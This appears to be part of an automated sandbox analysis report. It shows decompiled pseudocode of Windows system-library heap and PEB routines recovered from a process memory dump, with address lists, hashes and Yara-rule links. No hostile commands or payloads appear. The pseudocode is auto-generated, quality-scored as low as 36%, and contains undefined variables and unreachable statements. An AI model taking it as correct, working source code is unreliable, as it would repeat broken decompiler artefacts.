			E02B42073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E02B3FD22(__ecx);
				_t19 =  *0x2b7849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x2b78748; // 0x0
					if(__eflags <= 0) {
						E02B41C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x2b78724 & 0x00000004;
							if(( *0x2b78724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x2b78724; // 0x0
					return E02B38DF1(__ebx, 0xc0000374, 0x2b75890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x02b42076
0x02b42078
0x02b4207d
0x02b42083
0x02b420a4
0x02b420aa
0x02b420ac
0x02b420b7
0x02b420ba
0x02b420bc
0x02b420c9
0x02b420c9
0x02b420d0
0x02b420d2
0x00000000
0x02b420d2
0x02b420be
0x02b420c3
0x02b420c5
0x02b420c7
0x00000000
0x00000000
0x02b420c7
0x02b420bc
0x02b420d4
0x02b42085
0x02b42085
0x02b420a3
0x02b420a3

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19aef6d69f2051f92f0dd2d346a1bd69fe530ca899da80c8dda8aef52315bea
Instruction ID: 683347c5ba7dab14bf3dc98acb3139922d093c285271c170a92b9c502d93ed4a
Opcode Fuzzy Hash: f19aef6d69f2051f92f0dd2d346a1bd69fe530ca899da80c8dda8aef52315bea
Instruction Fuzzy Hash: 77F0203AC211844ADF326B2820893E27BD1CB45290B0908C6ECA05B308CE38A997FF20

Uniqueness

Uniqueness Score: -1.00%

Function 02B58D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E02B58D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x2b7d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E02AA7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x02b58d34
0x02b58d43
0x02b58d4b
0x02b58d4e
0x02b58d52
0x02b58d5c
0x02b58d6e
0x02b58d5e
0x02b58d67
0x02b58d67
0x02b58d79
0x02b58d7a
0x02b58d7c
0x02b58d81
0x02b58d94

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d60346067222118c440ac049fa85815f851ab54deb6e6d0bf6cd05ed4071fb1
Instruction ID: 907b001fbd99aa94086a76d5fc8f5a7f5a78e9ecde7bb5d369c871cb9fc82322
Opcode Fuzzy Hash: 5d60346067222118c440ac049fa85815f851ab54deb6e6d0bf6cd05ed4071fb1
Instruction Fuzzy Hash: CAF09A70A44608AFCB04EBA9D542BAEB7B8EF08300F108499E916EB280EB34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02A84F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A84F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E02B588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E02AAC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2a61030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x02a84f2e
0x02a84f34
0x02a84f38
0x02ae0b85
0x02ae0b85
0x02ae0b89
0x02ae0b9a
0x02ae0b9a
0x02ae0b9f
0x00000000
0x02ae0b9f
0x02ae0b94
0x02ae0b98
0x00000000
0x00000000
0x00000000
0x02ae0b98
0x02a84f3e
0x02a84f48
0x00000000
0x02a84f6e
0x00000000
0x02a84f70

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d75165bcf15ff9cc62268a5e8dbf389ada89930365bc2eda912173a1c81f5d
Instruction ID: e39ccb05a3990849b03ee4a053f58b4a9aa9cbe0e845007540496789a7f81c3d
Opcode Fuzzy Hash: 61d75165bcf15ff9cc62268a5e8dbf389ada89930365bc2eda912173a1c81f5d
Instruction Fuzzy Hash: DDF02E325212848FDB20C718C2C0B23B7E4BB00778F4000A5D50697A20EFA4EC81C650

Uniqueness

Uniqueness Score: -1.00%

Function 02B58B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E02B58B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x2b7d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E02AA7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x02b58b67
0x02b58b6f
0x02b58b72
0x02b58b7d
0x02b58b8f
0x02b58b7f
0x02b58b88
0x02b58b88
0x02b58b9a
0x02b58b9b
0x02b58b9d
0x02b58ba2
0x02b58bb5

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53188a7c81385b453deb5a58df2958dd0998d2b98183b662a0c1f164d07cfa1e
Instruction ID: 60464cb99cb9ff042482a12bbf06064b962fe469b58178ede55d2b34a04a5923
Opcode Fuzzy Hash: 53188a7c81385b453deb5a58df2958dd0998d2b98183b662a0c1f164d07cfa1e
Instruction Fuzzy Hash: 02F05EB0A44659ABDB00EBA8DA06A6EB3A8EF04304F140499A905AB281EB35D900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02B58CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E02B58CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x2b7d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E02AA7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E02ACB640(E02AC9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x02b58ce5
0x02b58ced
0x02b58cf0
0x02b58cfb
0x02b58d0d
0x02b58cfd
0x02b58d06
0x02b58d06
0x02b58d18
0x02b58d19
0x02b58d1b
0x02b58d20
0x02b58d33

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b73ed7066270a1bfa8a5665593a379a1e5b479c998e4816632ca152ff9730765
Instruction ID: a62417e93ac319b0ab4b173e8310134a2f3de87121728a211681fa50f4deb3d9
Opcode Fuzzy Hash: b73ed7066270a1bfa8a5665593a379a1e5b479c998e4816632ca152ff9730765
Instruction Fuzzy Hash: F1F08270A44219ABCB04EBA9D946EAE77B8EF08304F20059DE916EB2C0EF34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02AA746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E02AA746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E02A9EB70(__ecx, 0x2b779a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E02AC95D0();
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x02aa746d
0x02aa746d
0x02aa746d
0x02aa7471
0x02aa7488
0x02aef92d
0x02aa748e
0x02aa7491
0x02aa7495
0x02aef937
0x02aef93a
0x02aef94e
0x02aef953
0x02aef956
0x02aef956
0x02aa7495
0x00000000
0x02aa7488
0x02aa7473
0x02aa7478
0x02aa747d
0x02aa7481
0x00000000
0x02aa7481
0x02aa747d
0x02aa747a
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae7be9b69fb67cd28d5fb38bfecd390c7a851850d077e30a76b5272edb3d22b
Instruction ID: c349e45cad801905a98731c1508927e8ef5bbdaf4ec2092366f69d5eaf738a63
Opcode Fuzzy Hash: fae7be9b69fb67cd28d5fb38bfecd390c7a851850d077e30a76b5272edb3d22b
Instruction Fuzzy Hash: 6BF0E234E45244EBDF019B78CEA0B7FFBB2AF04314F040255D8A2AB160EF259801CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02ABA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02ABA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x2b77b9c; // 0x0
				_t15 = __ecx;
				_t16 = L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E02ACFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x02aba44b
0x02aba453
0x02aba472
0x02aba476
0x00000000
0x02aba493
0x02aba47a
0x02aba47f
0x02aba486
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d17ec3927d7c723951b1016e49b8a2d68c74631f21e988d10ae8d2e9e704407f
Instruction ID: 7028970362ab457b51fc59a0005c228cd0ab41e6ff94b71c1b828daedac836a6
Opcode Fuzzy Hash: d17ec3927d7c723951b1016e49b8a2d68c74631f21e988d10ae8d2e9e704407f
Instruction Fuzzy Hash: F4E09272A41421AFD2125B18AC00FA6B3AEDFD4651F198439F904C7211DE68DD11CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02A8F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E02A8F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E02ABF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L02AA4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x02a8f35d
0x02a8f361
0x02a8f367
0x02a8f372
0x02a8f38c
0x02a8f38c
0x02a8f394

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: fad49f95630b7d511cee8f52df145ad61d0e2fcb20e302bfe163c155fda8303a
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: A4E0DF32A81118BFCB21AAD99E05FAABBADDB48B60F0401D5BA04D7550DE689E10C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 02A9FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A9FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2a611a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E02B588F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E02AA0050(_t14);
				}
			}

0x02a9ff66
0x02a9ff6b
0x00000000
0x02a9ff8f
0x00000000
0x02a9ff8f

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882c0c36d39823473da72f54ba807880186c47af0b32228f9225698e6dc8cb6b
Instruction ID: c69045dea7c7dc462d8025574c920ce0ecf6122eeb376957f782c4affeee20ab
Opcode Fuzzy Hash: 882c0c36d39823473da72f54ba807880186c47af0b32228f9225698e6dc8cb6b
Instruction Fuzzy Hash: 63E09AB02052449EDB34DB52D190F253BE89B42721F19805EE40ACBA01CF21E8C0C606

Uniqueness

Uniqueness Score: -1.00%

Function 02B3D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B3D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L02A8E8B0(__ecx, _a4, 0xfff);
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x02b3d38a
0x02b3d39b
0x02b3d3b1
0x00000000
0x02b3d3b6
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 306b7fb60b6794d810112193d43b92dac01d92f33e684f09502f50d9f0c2f91f
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 24E0C231280205FBDB226E44CD00F79BB16DF407A0F108031FE086B690CA719C91DAC4

Uniqueness

Uniqueness Score: -1.00%

Function 02B141E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E02B141E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x2b608f0);
				_t5 = E02ADD08C(__ebx, __edi, __esi);
				if( *0x2b787ec == 0) {
					E02A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x2b787ec == 0) {
						 *0x2b787f0 = 0x2b787ec;
						 *0x2b787ec = 0x2b787ec;
						 *0x2b787e8 = 0x2b787e4;
						 *0x2b787e4 = 0x2b787e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L02B14248();
				}
				return E02ADD0D1(_t5);
			}

0x02b141e8
0x02b141ea
0x02b141ef
0x02b141fb
0x02b14206
0x02b1420b
0x02b14216
0x02b1421d
0x02b14222
0x02b1422c
0x02b14231
0x02b14231
0x02b14236
0x02b1423d
0x02b1423d
0x02b14247

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54bb9ec295c1897f0e62515a38d3ccbc4b972ee544ab7826fdde39a3278104f7
Instruction ID: a431b75dce5df8e2a4f46d8146b3f87f9f3213cd89e0930d3f234ee952c7042e
Opcode Fuzzy Hash: 54bb9ec295c1897f0e62515a38d3ccbc4b972ee544ab7826fdde39a3278104f7
Instruction Fuzzy Hash: 37F0327ACA0B00DFDBA0EFA9D60871837B5F7843A1F8049AA905787684CB744599EF02

Uniqueness

Uniqueness Score: -1.00%

Function 02ABA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02ABA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x2b767e4 >= 0xa) {
					if(_t5 < 0x2b76800 || _t5 >= 0x2b76900) {
						return L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E02AA0010(0x2b767e0, _t5);
				}
			}

0x02aba190
0x02aba1a6
0x02aba1c2
0x00000000
0x00000000
0x00000000
0x02aba192
0x02aba192
0x02aba19f
0x02aba19f

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce9bb0ca64a51e5174725f022ac9bb45d6fac2e4a597ca010718949c85f4ab7
Instruction ID: 1f38191a5b7a15ebff4ad30888cdd908336a53e1afb840924578e6f45485b5ff
Opcode Fuzzy Hash: 5ce9bb0ca64a51e5174725f022ac9bb45d6fac2e4a597ca010718949c85f4ab7
Instruction Fuzzy Hash: ABD02E335A08006AC62E2B11AE64B27231FEF84740F30488DE2270B9A2DE708CECC509

Uniqueness

Uniqueness Score: -1.00%

Function 02AB16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AB16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E02AB1710(0x2b767e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L02AA4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x02ab16e8
0x02ab16ef
0x02ab16f3
0x02ab16fe
0x00000000
0x02ab1700
0x02ab170d
0x02ab170d
0x02ab16f2
0x02ab16f2
0x02ab16f2
0x02ab16f2

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369f5c732f74d2c0266289a36b732b2a0fc675709ea216a7121eddb8beecc85b
Instruction ID: 1e9c465a9fe7fb0d90e5b3097d80061513029b97c5676b2d860eddbf8e268f88
Opcode Fuzzy Hash: 369f5c732f74d2c0266289a36b732b2a0fc675709ea216a7121eddb8beecc85b
Instruction Fuzzy Hash: 72D0A73114010096DA2E5B249974B55235ADF80785F38045CF10F4A8C2DFB0CDA2E888

Uniqueness

Uniqueness Score: -1.00%

Function 02B053CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B053CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E02A9EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x02b053ca
0x02b053ce
0x02b053d9
0x02b053de
0x02b053e1
0x02b053e1
0x02b053e6
0x02b053f3
0x00000000
0x02b053f8
0x02b053fb

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 30e165dfd03bb7f14564c77ebc3eb330b25df2a9e4b8f10927ebe84cd80673d1
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 15E0EC71A44784DBCF23DB59CB90F5EBBF6FB44B40F154454A4095BAA1CB65AD00CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02A9AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A9AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x02a9aab6
0x02a9aabb
0x02aea442
0x00000000
0x02aea448
0x02aea454
0x02aea454
0x02a9aac1
0x02a9aac1
0x02a9aac6
0x02a9aac6

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 69f15ff3153f1c8f0c14c07a906790692d8939ccd9ca46e005e3468ad75bcad0
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: F9D0E935352980CFDB16DB1DC594B1573F4BB44B44FC50490E901CBB62EB2CD945CA00

Uniqueness

Uniqueness Score: -1.00%

Function 02AB35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AB35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E02A9EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x02ab35a1
0x02ab35a1
0x02ab35a5
0x02ab35ab
0x02ab35ab
0x02ab35b5
0x00000000
0x02ab35c1
0x02ab35b7

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 1acbd6572b67487f05d1e7e5503b987b4af2cab9305764dbb8b0bf54f897f262
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 2DD0C935591184DEDF53EF60C3587E877BABF00218F5822E6944606953EB3B4A5ADA01

Uniqueness

Uniqueness Score: -1.00%

Function 02A8DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A8DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L02AA4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x02a8db4d
0x02a8db54
0x02a8db5f
0x02a8db56
0x02a8db56
0x02a8db5c
0x02a8db5c

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: c812c72db4cf3c2744fb7a8c1cc0d922d3be948f561389937959189acc1545f8
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: A3C08C302C0A40AAEB222F20CE01B0076A1BB00B05F4404A07300DA0F0EFB8D801EA00

Uniqueness

Uniqueness Score: -1.00%

Function 02B0A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B0A537(intOrPtr _a4, intOrPtr _a8) {

				return L02AA8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x02b0a553

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
